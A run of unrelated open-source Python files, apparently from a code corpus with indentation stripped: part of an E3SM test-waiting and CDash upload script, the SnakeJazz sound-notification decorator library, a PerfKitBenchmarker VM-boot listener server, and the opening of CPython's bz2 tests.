if (os.path.exists(tarball)):
os.remove(tarball)
run_cmd_no_fail("tar -cf - {} | gzip -c".format(log_dir), arg_stdout=tarball)
base64 = run_cmd_no_fail("base64 {}".format(tarball))
xml_text = \
r"""<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="Dart/Source/Server/XSL/Build.xsl <file:///Dart/Source/Server/XSL/Build.xsl> "?>
<Site BuildName="{}" BuildStamp="{}-{}" Name="{}" Generator="ctest3.0.0">
<Upload>
<File filename="{}">
<Content encoding="base64">
{}
</Content>
</File>
</Upload>
</Site>
""".format(cdash_build_name, utc_time, cdash_build_group, hostname, os.path.abspath(tarball), base64)
with open(os.path.join(data_rel_path, "Upload.xml"), "w") as fd:
fd.write(xml_text)
finally:
if (os.path.isdir(log_dir)):
shutil.rmtree(log_dir)
###############################################################################
def create_cdash_xml(results, cdash_build_name, cdash_project, cdash_build_group, force_log_upload=False):
###############################################################################
#
# Create dart config file
#
current_time = time.time()
utc_time_tuple = time.gmtime(current_time)
cdash_timestamp = time.strftime("%H:%M:%S", utc_time_tuple)
hostname = Machines().get_machine_name()
if (hostname is None):
hostname = socket.gethostname().split(".")[0]
logging.warning("Could not convert hostname '{}' into an E3SM machine name".format(hostname))
dart_config = \
"""
SourceDirectory: {0}
BuildDirectory: {0}
# Site is something like machine.domain, i.e. pragmatic.crd
Site: {1}
# Build name is osname-revision-compiler, i.e. Linux-2.4.2-2smp-c++
BuildName: {2}
# Submission information
IsCDash: TRUE
CDashVersion:
QueryCDashVersion:
DropSite: my.cdash.org
DropLocation: /submit.php?project={3}
DropSiteUser:
DropSitePassword:
DropSiteMode:
DropMethod: http
TriggerSite:
ScpCommand: {4}
# Dashboard start time
NightlyStartTime: {5} UTC
""".format(os.getcwd(), hostname, cdash_build_name, cdash_project,
find_executable("scp"), cdash_timestamp)
with open("DartConfiguration.tcl", "w") as dart_fd:
dart_fd.write(dart_config)
utc_time = time.strftime('%Y%m%d-%H%M', utc_time_tuple)
os.makedirs(os.path.join("Testing", utc_time))
# Make tag file
with open("Testing/TAG", "w") as tag_fd:
tag_fd.write("{}\n{}\n".format(utc_time, cdash_build_group))
create_cdash_xml_fakes(results, cdash_build_name, cdash_build_group, utc_time, current_time, hostname)
create_cdash_upload_xml(results, cdash_build_name, cdash_build_group, utc_time, hostname, force_log_upload)
run_cmd_no_fail("ctest -VV -D NightlySubmit", verbose=True)
###############################################################################
def wait_for_test(test_path, results, wait, check_throughput, check_memory, ignore_namelists, ignore_memleak, no_run):
###############################################################################
if (os.path.isdir(test_path)):
test_status_filepath = os.path.join(test_path, TEST_STATUS_FILENAME)
else:
test_status_filepath = test_path
logging.debug("Watching file: '{}'".format(test_status_filepath))
test_log_path = os.path.join(os.path.dirname(test_status_filepath), ".internal_test_status.log")
# We don't want to make it a requirement that wait_for_tests has write access
# to all case directories
try:
fd = open(test_log_path, "w")
fd.close()
except (IOError, OSError):
test_log_path = "/dev/null"
prior_ts = None
with open(test_log_path, "w") as log_fd:
while (True):
if (os.path.exists(test_status_filepath)):
ts = TestStatus(test_dir=os.path.dirname(test_status_filepath))
test_name = ts.get_name()
test_status = ts.get_overall_test_status(wait_for_run=not no_run, # Important
no_run=no_run,
check_throughput=check_throughput,
check_memory=check_memory, ignore_namelists=ignore_namelists,
ignore_memleak=ignore_memleak)
if prior_ts is not None and prior_ts != ts:
log_fd.write(ts.phase_statuses_dump())
log_fd.write("OVERALL: {}\n\n".format(test_status))
prior_ts = ts
if (test_status == TEST_PEND_STATUS and (wait and not SIGNAL_RECEIVED)):
time.sleep(SLEEP_INTERVAL_SEC)
logging.debug("Waiting for test to finish")
else:
results.put( (test_name, test_path, test_status) )
break
else:
if (wait and not SIGNAL_RECEIVED):
logging.debug("File '{}' does not yet exist".format(test_status_filepath))
time.sleep(SLEEP_INTERVAL_SEC)
else:
test_name = os.path.abspath(test_status_filepath).split("/")[-2]
results.put( (test_name, test_path, "File '{}' doesn't exist".format(test_status_filepath)) )
break
###############################################################################
def wait_for_tests_impl(test_paths, no_wait=False, check_throughput=False, check_memory=False, ignore_namelists=False, ignore_memleak=False, no_run=False):
###############################################################################
results = queue.Queue()
for test_path in test_paths:
t = threading.Thread(target=wait_for_test, args=(test_path, results, not no_wait, check_throughput, check_memory, ignore_namelists, ignore_memleak, no_run))
t.daemon = True
t.start()
while threading.active_count() > 1:
time.sleep(1)
test_results = {}
completed_test_paths = []
while (not results.empty()):
test_name, test_path, test_status = results.get()
if (test_name in test_results):
prior_path, prior_status = test_results[test_name]
if (test_status == prior_status):
logging.warning("Test name '{}' was found in both '{}' and '{}'".format(test_name, test_path, prior_path))
else:
raise CIMEError("Test name '{}' was found in both '{}' and '{}' with different results".format(test_name, test_path, prior_path))
test_results[test_name] = (test_path, test_status)
completed_test_paths.append(test_path)
expect(set(test_paths) == set(completed_test_paths),
"Missing results for test paths: {}".format(set(test_paths) - set(completed_test_paths)))
return test_results
###############################################################################
def wait_for_tests(test_paths,
no_wait=False,
check_throughput=False,
check_memory=False,
ignore_namelists=False,
ignore_memleak=False,
cdash_build_name=None,
cdash_project=E3SM_MAIN_CDASH,
cdash_build_group=CDASH_DEFAULT_BUILD_GROUP,
timeout=None,
force_log_upload=False,
no_run=False,
update_success=False):
###############################################################################
# Set up signal handling, we want to print results before the program
# is terminated
set_up_signal_handlers()
with Timeout(timeout, action=signal_handler):
test_results = wait_for_tests_impl(test_paths, no_wait, check_throughput, check_memory, ignore_namelists, ignore_memleak, no_run)
all_pass = True
for test_name, test_data in sorted(test_results.items()):
test_path, test_status = test_data
logging.info("Test '{}' finished with status '{}'".format(test_name, test_status))
logging.info(" Path: {}".format(test_path))
all_pass &= test_status == TEST_PASS_STATUS
if update_success:
caseroot = os.path.dirname(test_data[0])
with Case(caseroot, read_only=True) as case:
srcroot = case.get_value("SRCROOT")
baseline_root = case.get_value("BASELINE_ROOT")
save_test_success(baseline_root, srcroot, test_name, test_status in [TEST_PASS_STATUS, NAMELIST_FAIL_STATUS])
if cdash_build_name:
create_cdash_xml(test_results, cdash_build_name, cdash_project, cdash_build_group, force_log_upload)
return all_pass
|
snakejazz.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# This file is part of the
# SnakeJazz Project (https://github.com/mchalela/SnakeJazz/).
# Copyright (c) 2020, Martin Chalela
# License: MIT
# Full Text: https://github.com/mchalela/SnakeJazz/blob/master/LICENSE
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# DOCS
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"""
SnakeJazz.
Listen to the running status of your ~~Snake~~ Python functions.
"""
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# IMPORTS
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
import multiprocessing as mp
import os
from contextlib import redirect_stdout
from functools import partial, wraps
# Hide print message at import
os.environ["PYGAME_HIDE_SUPPORT_PROMPT"] = "hide"
import pygame
from validator_collection import checkers
from youtube_dl import YoutubeDL
from . import sounds
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# CONSTANTS
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
DEFAULT_START = sounds.RHODESMAS["connected-01.wav"]
DEFAULT_FINISH = sounds.RHODESMAS["disconnected-01.wav"]
DEFAULT_ERROR = sounds.RHODESMAS["failure-01.wav"]
DEFAULT_URL_START = sounds.RICK_AND_MORTY
DEFAULT_URL_FINISH = sounds.RICK_AND_MORTY
DEFAULT_URL_ERROR = sounds.RICK_AND_MORTY
DEFAULT_RATTLE = sounds.RICK_AND_MORTY
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# EXCEPTIONS
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
class SnakeNotFoundError(FileNotFoundError):
"""Raised when the file can't be found."""
pass
class URLError(OSError):
"""Raised when the url is invalid."""
pass
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# PRIVATE FUNCTIONS
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def _parse_param(param, default):
if param is not None and not isinstance(param, (bool, str)):
raise ValueError(f"Invalid parameter input {param}.")
if param is None or param is False:
return False
elif param is True:
return default
elif os.path.isfile(str(param)):
return str(param)
else:
raise SnakeNotFoundError(f"The snake file {param} doesn't exists.")
def _parse_url(param, default):
if param is not None and not isinstance(param, (bool, str)):
raise ValueError(f"Invalid parameter input {param}.")
if param is None or param is False:
return False
elif param is True:
return default
elif checkers.is_url(str(param)):
return str(param)
else:
raise URLError(f"Invalid url: {param}")
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# SOUND PLAYER
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def play_sound(sound_path, loops=0):
"""Reproduce the sound.
The library PyGame is used to reproduce sounds.
Parameters
----------
sound_path: string, path
Path to the sound file.
loops: int
Number of times the sound will be played.
0: A single time
-1: Inifinte loop
"""
pygame.mixer.init()
pygame.mixer.music.load(sound_path)
pygame.mixer.music.play(loops=loops)
while pygame.mixer.music.get_busy():
continue
pygame.mixer.music.unload()
return
def get_sound(
yt_url=None,
yt_id="ahgcD1xjRiQ",
use_cache=True,
):
"""Download the sound.
The library youtube-dl is used to download sounds.
Parameters
----------
yt_url: string, link
Youtube link. The audio will be extracted from the video.
yt_id: str, id
Youtube video id. Is this is given the full url will be
completed as https://www.youtube.com/watch?v=yt_id
use_cache: bool
When True, a sound will be downloaded just once and save it
for later use if needed.
"""
# Build the video url
if yt_url is None:
yt_url = f"https://www.youtube.com/watch?v={yt_id}"
else:
# = for long urls and / for short urls
s = "=" if "=" in yt_url else "/"
yt_id = yt_url.split(s)[-1]
# Build the final output path
sound_path = str(sounds.DOWNLOAD_PATH / f"{yt_id}.wav")
# If cache then dont't download again
if use_cache and os.path.isfile(sound_path):
return sound_path
# Prepare the parameters needed by youtube_dl
outtmpl = str(sounds.DOWNLOAD_PATH / "%(id)s.%(ext)s")
ydl_opts = {
"format": "bestaudio/best",
"outtmpl": outtmpl,
"postprocessors": [
{
"key": "FFmpegExtractAudio",
"preferredcodec": "wav",
"preferredquality": "120",
}
],
}
# Download the audio. Dissable all prints
with open(os.devnull, "w") as fp, redirect_stdout(fp):
with YoutubeDL(ydl_opts) as ydl:
ydl.download([yt_url])
if not os.path.isfile(sound_path):
raise SnakeNotFoundError("Ups! Something went wrong.")
return sound_path
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# DECORATOR
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def zzz(method=None, *, when_start=False, when_finish=True, when_error=False):
"""Sound decorator to notify the execution status of a function.
Parameters
----------
method: callable
Function, class method or any callable object. SnakeJazz will track
the strating and finishing event and play the desired sound.
when_start: string, path, optional
Path to the sound file that will be played at the same instant that
the execution of 'method' starts. A new process handles the
reproduction of the sound.
when_finish: string, path, optional
Path to the sound file that will be played at the same instant that
the execution of 'method' ends. A new process handles the
reproduction of the sound.
when_error: string, path, optional
Path to the sound file that will be played if an exception occurs
during the execution of 'method'. If an error occurs, no finishing
sound is played. A new process handles the reproduction of the sound.
Notes
-----
SnakeJazz uses PyGame API to reproduce sounds.
The default sounds distributed with SnakeJazz belong to the respective
creators.
Rhodesmas:
>> Downloaded from https://freesound.org/people/rhodesmas/packs/17958/
"""
@wraps(method)
def wrapper(*args, **kwargs):
start = _parse_param(when_start, default=DEFAULT_START)
finish = _parse_param(when_finish, default=DEFAULT_FINISH)
error = _parse_param(when_error, default=DEFAULT_ERROR)
# START SOUND ----------------------------------------------------
if start:
start_proc = mp.Process(target=play_sound, args=(start,))
start_proc.start()
# EXCECUTION ----------------------------------------------------
# Catch momentarily any exception to determine
# if the sound must be played
if error:
try:
output = method(*args, **kwargs)
except Exception as exc:
error_occurred = True
raise exc
else:
error_occurred = False
finally:
if error_occurred:
if start:
start_proc.terminate()
error_proc = mp.Process(target=play_sound, args=(error,))
error_proc.start()
else:
output = method(*args, **kwargs)
error_occurred = False
if start:
start_proc.terminate()
# FINISH SOUND ----------------------------------------------------
if finish and not error_occurred:
finish_proc = mp.Process(target=play_sound, args=(finish,))
finish_proc.start()
return output
# Return wrapper depending on the type of 'method'.
# It's a function if it's used as `@snakejazz.zzz`
# but ``None`` if used as `@snakejazz.zzz()`.
if method is None:
return partial(
zzz,
when_start=when_start,
when_finish=when_finish,
when_error=when_error,
)
else:
return wrapper
def www(method=None, *, when_start=False, when_finish=True, when_error=False):
"""Sound decorator to notify the execution status of a function.
Parameters
----------
method: callable
Function, class method or any callable object. SnakeJazz will track
the strating and finishing event and play the desired sound.
when_start: string, link, optional
Youtube link to the audio that will be played at the same instant that
the execution of 'method' starts. A new process handles the
reproduction of the sound.
when_finish: string, link, optional
Youtube link to the audio that will be played at the same instant that
the execution of 'method' ends. A new process handles the
reproduction of the sound.
when_error: string, link, optional
Youtube link to the audio that will be played if an exception occurs
during the execution of 'method'. If an error occurs, no finishing
sound is played. A new process handles the reproduction of the sound.
Notes
-----
SnakeJazz uses PyGame API to reproduce sounds and YoutubeDL to
download audio from youtube videos.
The default sounds distributed with SnakeJazz belong to the respective
creators.
Rhodesmas:
>> Downloaded from https://freesound.org/people/rhodesmas/packs/17958/
"""
start_url = _parse_url(when_start, default=DEFAULT_URL_START)
finish_url = _parse_url(when_finish, default=DEFAULT_URL_FINISH)
error_url = _parse_url(when_error, default=DEFAULT_URL_ERROR)
start = get_sound(yt_url=start_url) if start_url else False
finish = get_sound(yt_url=finish_url) if finish_url else False
error = get_sound(yt_url=error_url) if error_url else False
# Return wrapper depending on the type of 'method'.
# It's a function if it's used as `@snakejazz.decorator`
# but ``None`` if used as `@snakejazz.decorator()`.
if method is None:
return partial(
zzz,
when_start=start,
when_finish=finish,
when_error=error,
)
else:
return zzz(
method=method,
when_start=start,
when_finish=finish,
when_error=error,
)
def rattle(method=None, *, zound=None, url=DEFAULT_RATTLE):
"""Reproduce the sound in loop until the execution is completed.
Parameters
----------
method: callable
Function, class method or any callable object. SnakeJazz will track
the strating and finishing event and play the desired sound.
zound: string, path, optional
Path to the sound file that will be played during the execution
of 'method'. A new process handles the reproduction of the sound.
url: string, path, optional
Youtube link to the audio that will be played during the execution
of 'method'. A new process handles the reproduction of the sound.
Notes
-----
SnakeJazz uses PyGame API to reproduce sounds and YoutubeDL to
download audio from youtube videos.
The default sounds distributed with SnakeJazz belong to the respective
creators.
Rhodesmas:
>> Downloaded from https://freesound.org/people/rhodesmas/packs/17958/
"""
@wraps(method)
def wrapper(*args, **kwargs):
if zound is None and isinstance(url, str):
sound_path = get_sound(yt_url=url)
elif isinstance(zound, str):
sound_path = _parse_param(zound, default=None)
proc = mp.Process(target=play_sound, args=(sound_path, -1))
try:
# START SOUND ----------------------------------------------------
proc.start()
# EXCECUTION ----------------------------------------------------
return method(*args, **kwargs)
finally:
proc.terminate()
# Return wrapper depending on the type of 'method'.
# It's a function if it's used as `@snakejazz.rattle`
# but ``None`` if used as `@snakejazz.rattle()`.
if method is None:
return partial(
rattle,
zound=zound,
url=url,
)
else:
return wrapper
|
listener_server.py | # Copyright 2020 PerfKitBenchmarker Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Server to wait for incoming curls from booted VMs for large scale boot.
Large scale boot benchmark spins up launcher vms which, in turn, spins up boot
vms and measure their boot time. The launcher vm is an empty linux vm that
could be on any cloud. In order to ensure portability, the listening server is
http server written in python.
This script is downloaded onto cloud launcher VMs by the benchmark. It will
wait for incoming curl requests from booted vms. When it gets an incoming curl
request, it first double check that the other vm a valid vm, is reachable,
then record the system time in nanoseconds.
"""
import functools
from http import server
import logging
import multiprocessing
import os
import subprocess
import sys
import threading
import time
# Amount of time in seconds to attempt calling a client VM if VM calling in.
MAX_TIME_SECONDS = 30
# Amount of time in seconds to attempt calling a client VM if VM not calling in.
MAX_TIME_SECONDS_NO_CALLING = 1200
# entry to stop processing from the timing queue
_STOP_QUEUE_ENTRY = 'stop'
# Tag for undefined hostname, should be synced with large_scale_boot_benchmark.
UNDEFINED_HOSTNAME = 'UNDEFINED'
# Tag for sequential hostname, should be synced with large_scale_boot_benchmark.
SEQUENTIAL_IP = 'SEQUENTIAL_IP'
# Multiplier for nanoseconds
NANO = 1e9
def ConfirmIPAccessible(client_host, port, timeout=MAX_TIME_SECONDS):
"""Confirm the given host's port is accessible and return the access time."""
netcat_command = 'nc -zv -w 1 {client} {port}'.format(
client=client_host,
port=port)
start_time = time.time()
while time.time() <= (start_time + timeout):
p = subprocess.Popen(netcat_command, shell=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
_, stderr = p.communicate()
# different versions of netcat uses different stderr strings.
if any(word in stderr.decode('utf-8') for word in ['open', 'succeeded']):
# return the system time in nanoseconds
return 'Pass:%s:%d' % (client_host, time.time() * NANO)
logging.warning('Could not netcat to port %s on client vm %s.',
port, client_host)
return 'Fail:%s:%d' % (client_host, time.time() * NANO)
def WaitForRunningStatus(client_host, timeout=MAX_TIME_SECONDS):
"""Wait for the VM to report running status.
Status command generated from data/large_scale_boot/vm_status.sh.jinja2.
Args:
client_host: client host to check for running status.
timeout: Max timeout to wait before declaring failure.
Returns:
host status string.
"""
with open('/tmp/pkb/vm_status.sh', 'r') as reader:
command = reader.read()
start_time = time.time()
while time.time() <= (start_time + timeout):
p = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE,
universal_newlines=True, stderr=subprocess.PIPE)
status, _ = p.communicate()
if 'running' in status.lower():
return 'Running:%s:%d' % (client_host, time.time() * NANO)
logging.warning('Client vm %s not running yet.', client_host)
return 'Fail:%s:%d' % (client_host, time.time() * NANO)
def StoreResult(result_str, queue):
"""Stores a given result string to results queue."""
if result_str:
queue.put(result_str)
def WriteResultsToFile(results_path, queue):
"""Write anything in results queue to a file."""
with open(results_path, 'a') as writer:
while True:
result = queue.get()
if result == _STOP_QUEUE_ENTRY:
logging.info('Told to stop writing to file %s from queue', results_path)
return
writer.write('{}\n'.format(result))
writer.flush()
def BuildHostNames(name_pattern, count, use_public_ip):
"""Derieve host names from either name pattern or boot logs.
See large_scale_boot benchmark for name_pattern. For example, SEQUENTIAL_IP
name pattern is in the form of 'SEQUENTIAL_IP_{public_dns}_{start_index}'.
Args:
name_pattern: Name pattern to build host names with.
count: count of vms.
use_public_ip: hostnames should be public ip.
Returns:
hostnames or host ips to access.
"""
if name_pattern == UNDEFINED_HOSTNAME:
return WaitForHostNames(use_public_ip)
elif SEQUENTIAL_IP in name_pattern:
public_dns = name_pattern.split('_')[-2]
start_vm_index = int(name_pattern.split('_')[-1])
if public_dns:
return [public_dns.replace('VMID', str(vm_id))
for vm_id in range(start_vm_index, count + start_vm_index)]
else:
return GenerateHostIPs(start_vm_index, count)
else:
return [name_pattern.replace('VM_ID', str(vm_id))
for vm_id in range(1, count + 1)]
def WaitForHostNames(use_public_ip, timeout=MAX_TIME_SECONDS_NO_CALLING):
"""Wait for boot logs to complete and grep the newly created ips.
After boot_script.sh completes, it will print out [completed].
In boot_script.sh output, outputs will be of the following formats:
GCP:
networkInterfaces[0].accessConfigs[0].natIP: 34.94.81.165
AWS:
PRIVATEIPADDRESSES True ip-10-0-0-143.ec2.internal 10.0.0.143
ASSOCIATION amazon ec2-100-24-107-67.compute-1.amazonaws.com 100.24.107.67
Args:
use_public_ip: whether to use public_ip hostname.
timeout: Amount of time in seconds to wait for boot.
Returns:
hosts to netcat.
"""
start_time = time.time()
while time.time() <= (start_time + timeout):
if os.system('grep completed log') != 0:
time.sleep(1)
continue
with open('log', 'r') as f:
hostnames = []
for line in f:
# look for GCP public ip
if 'natIP' in line:
hostnames.append(line.split()[1])
# look for amazon public ip if set
if use_public_ip and 'ASSOCIATION' in line:
hostnames.append(line.split()[3])
# look for amazon private ip if public ip is not set
if not use_public_ip and 'PRIVATEIPADDRESSES' in line:
hostnames.append(line.split()[2])
return set(hostnames)
raise ValueError('Boot did not complete successfully before timeout of %s '
'seconds.' % MAX_TIME_SECONDS_NO_CALLING)
def GenerateHostIPs(boot_vm_index, count):
"""Logic must be aligned with large_scale_boot/boot_script.sh."""
hostnames = []
for vm_id in range(boot_vm_index, boot_vm_index + count):
hostnames.append('10.0.{octet3}.{octet4}'.format(
octet3=vm_id // 256,
octet4=vm_id % 256))
return hostnames
def ActAsClient(pool, queue, port, name_pattern, vms_count, use_public_ip):
"""Use as a client."""
store_results = functools.partial(StoreResult, queue=queue)
all_jobs = []
for host_name in BuildHostNames(name_pattern, vms_count, use_public_ip):
job = pool.apply_async(
ConfirmIPAccessible,
args=(host_name, port, MAX_TIME_SECONDS_NO_CALLING,),
callback=store_results)
all_jobs.append(job)
if vms_count == 1:
status_job = pool.apply_async(
WaitForRunningStatus,
args=(host_name, MAX_TIME_SECONDS_NO_CALLING,),
callback=store_results)
all_jobs.append(status_job)
logging.info([async_job.get() for async_job in all_jobs])
queue.put(_STOP_QUEUE_ENTRY)
def ActAsServer(pool, queue, port, host_name, listening_server):
"""Use as a server."""
handler = functools.partial(RequestHandler, pool, host_name, queue, port)
listener = server.HTTPServer(listening_server, handler)
logging.info('Starting httpserver...\n')
try:
listener.serve_forever()
except KeyboardInterrupt:
logging.info('^C received, shutting down server')
listener.server_close()
queue.put(_STOP_QUEUE_ENTRY)
class RequestHandler(server.BaseHTTPRequestHandler):
"""Request handler for incoming curl requests from booted vms."""
def __init__(self, pool, launcher, queue, access_port, *args, **kwargs):
"""Creates a RequestHandler for a http request received by the server.
Args:
pool: multiprocessing process pool object.
launcher: name string of the launcher vm that the server is on.
queue: multiprocessing queue object.
access_port: port number to call on the booted vms.
*args: Other argments to apply to the request handler.
**kwargs: Keyword arguments to apply to the request handler.
"""
self.process_pool = pool
self.launcher = launcher
self.timing_queue = queue
self.access_port = access_port
# BaseHTTPRequestHandler calls do_GET inside __init__
# So we have to call super().__init__ after setting attributes.
super(RequestHandler, self).__init__(*args, **kwargs)
def do_GET(self): # pylint: disable=g-bad-name
"""Process GET requests."""
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.end_headers()
self.wfile.write(bytes('OK', 'UTF-8'))
# Check that we are not getting random curls on the internet.
client_host = self.client_address[0]
client_check_str = self.headers.get('X-Header', None)
if client_check_str != self.launcher:
logging.error('Got curl with unknown X-Header: %s', client_check_str)
self.shutdown()
return
# Process this client
logging.info(client_host)
store_results_func = functools.partial(StoreResult, queue=self.timing_queue)
self.process_pool.apply_async(ConfirmIPAccessible,
args=(client_host, self.access_port,),
callback=store_results_func)
def shutdown(self):
"""Shut down the server."""
t = threading.Thread(target=self.server.shutdown)
logging.info('Server shut down.')
t.start()
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
if len(sys.argv) != 9:
raise ValueError('Got unexpected number of command-line arguments. '
'There should be at most 7 command-line arguments: '
'1. name of the server vm, '
'2. server port, '
'3. results file, '
'4. port to access the boot VMs, '
'5. whether to use the listening server, '
'6. launched vm naming pattern, '
'7. number of launched vms.'
'8. whether to use public ip address.')
hostname = sys.argv[1]
server_address = ('', int(sys.argv[2]))
results_file_path = sys.argv[3]
clients_port = sys.argv[4]
use_listening_server = sys.argv[5] == 'True'
vms_name_pattern = sys.argv[6]
num_vms = int(sys.argv[7])
using_public_ip = sys.argv[8] == 'True'
process_pool = multiprocessing.Pool()
multiprocessing_manager = multiprocessing.Manager()
timing_queue = multiprocessing_manager.Queue()
# Start the worker to move results from queue to file first.
process_pool.apply_async(WriteResultsToFile,
args=(results_file_path, timing_queue,))
if use_listening_server:
ActAsServer(process_pool, timing_queue, clients_port, hostname,
server_address)
# The start the server to listen and put results on queue.
else:
ActAsClient(process_pool, timing_queue, clients_port,
vms_name_pattern, num_vms, using_public_ip)
|
test_bz2.py | from test import support
from test.support import bigmemtest, _4G
import unittest
from io import BytesIO, DEFAULT_BUFFER_SIZE
import os
import pickle
import glob
import random
import shutil
import subprocess
import sys
from test.support import unlink
import _compression
try:
import threading
except ImportError:
threading = None
# Skip tests if the bz2 module doesn't exist.
bz2 = support.import_module('bz2')
from bz2 import BZ2File, BZ2Compressor, BZ2Decompressor
has_cmdline_bunzip2 = None
def ext_decompress(data):
global has_cmdline_bunzip2
if has_cmdline_bunzip2 is None:
has_cmdline_bunzip2 = bool(shutil.which('bunzip2'))
if has_cmdline_bunzip2:
return subprocess.check_output(['bunzip2'], input=data)
else:
return bz2.decompress(data)
class BaseTest(unittest.TestCase):
"Base for other testcases."
TEXT_LINES = [
b'root:x:0:0:root:/root:/bin/bash\n',
b'bin:x:1:1:bin:/bin:\n',
b'daemon:x:2:2:daemon:/sbin:\n',
b'adm:x:3:4:adm:/var/adm:\n',
b'lp:x:4:7:lp:/var/spool/lpd:\n',
b'sync:x:5:0:sync:/sbin:/bin/sync\n',
b'shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\n',
b'halt:x:7:0:halt:/sbin:/sbin/halt\n',
b'mail:x:8:12:mail:/var/spool/mail:\n',
b'news:x:9:13:news:/var/spool/news:\n',
b'uucp:x:10:14:uucp:/var/spool/uucp:\n',
b'operator:x:11:0:operator:/root:\n',
b'games:x:12:100:games:/usr/games:\n',
b'gopher:x:13:30:gopher:/usr/lib/gopher-data:\n',
b'ftp:x:14:50:FTP User:/var/ftp:/bin/bash\n',
b'nobody:x:65534:65534:Nobody:/home:\n',
b'postfix:x:100:101:postfix:/var/spool/postfix:\n',
b'niemeyer:x:500:500::/home/niemeyer:/bin/bash\n',
b'postgres:x:101:102:PostgreSQL Server:/var/lib/pgsql:/bin/bash\n',
b'mysql:x:102:103:MySQL server:/var/lib/mysql:/bin/bash\n',
b'www:x:103:104::/var/www:/bin/false\n',
]
TEXT = b''.join(TEXT_LINES)
DATA = b'BZh91AY&SY.\xc8N\x18\x00\x01>_\x80\x00\x10@\x02\xff\xf0\x01\x07n\x00?\xe7\xff\xe00\x01\x99\xaa\x00\xc0\x03F\x86\x8c#&\x83F\x9a\x03\x06\xa6\xd0\xa6\x93M\x0fQ\xa7\xa8\x06\x804hh\x12$\x11\xa4i4\xf14S\xd2<Q\xb5\x0fH\xd3\xd4\xdd\xd5\x87\xbb\xf8\x94\r\x8f\xafI\x12\xe1\xc9\xf8/E\x00pu\x89\x12]\xc9\xbbDL\nQ\x0e\t1\x12\xdf\xa0\xc0\x97\xac2O9\x89\x13\x94\x0e\x1c7\x0ed\x95I\x0c\xaaJ\xa4\x18L\x10\x05#\x9c\xaf\xba\xbc/\x97\x8a#C\xc8\xe1\x8cW\xf9\xe2\xd0\xd6M\xa7\x8bXa<e\x84t\xcbL\xb3\xa7\xd9\xcd\xd1\xcb\x84.\xaf\xb3\xab\xab\xad`n}\xa0lh\tE,\x8eZ\x15\x17VH>\x88\xe5\xcd9gd6\x0b\n\xe9\x9b\xd5\x8a\x99\xf7\x08.K\x8ev\xfb\xf7xw\xbb\xdf\xa1\x92\xf1\xdd|/";\xa2\xba\x9f\xd5\xb1#A\xb6\xf6\xb3o\xc9\xc5y\\\xebO\xe7\x85\x9a\xbc\xb6f8\x952\xd5\xd7"%\x89>V,\xf7\xa6z\xe2\x9f\xa3\xdf\x11\x11"\xd6E)I\xa9\x13^\xca\xf3r\xd0\x03U\x922\xf26\xec\xb6\xed\x8b\xc3U\x13\x9d\xc5\x170\xa4\xfa^\x92\xacDF\x8a\x97\xd6\x19\xfe\xdd\xb8\xbd\x1a\x9a\x19\xa3\x80ankR\x8b\xe5\xd83]\xa9\xc6\x08\x82f\xf6\xb9"6l$\xb8j@\xc0\x8a\xb0l1..\xbak\x83ls\x15\xbc\xf4\xc1\x13\xbe\xf8E\xb8\x9d\r\xa8\x9dk\x84\xd3n\xfa\xacQ\x07\xb1%y\xaav\xb4\x08\xe0z\x1b\x16\xf5\x04\xe9\xcc\xb9\x08z\x1en7.G\xfc]\xc9\x14\xe1B@\xbb!8`'
EMPTY_DATA = b'BZh9\x17rE8P\x90\x00\x00\x00\x00'
BAD_DATA = b'this is not a valid bzip2 file'
# Some tests need more than one block of uncompressed data. Since one block
# is at least 100 kB, we gather some data dynamically and compress it.
# Note that this assumes that compression works correctly, so we cannot
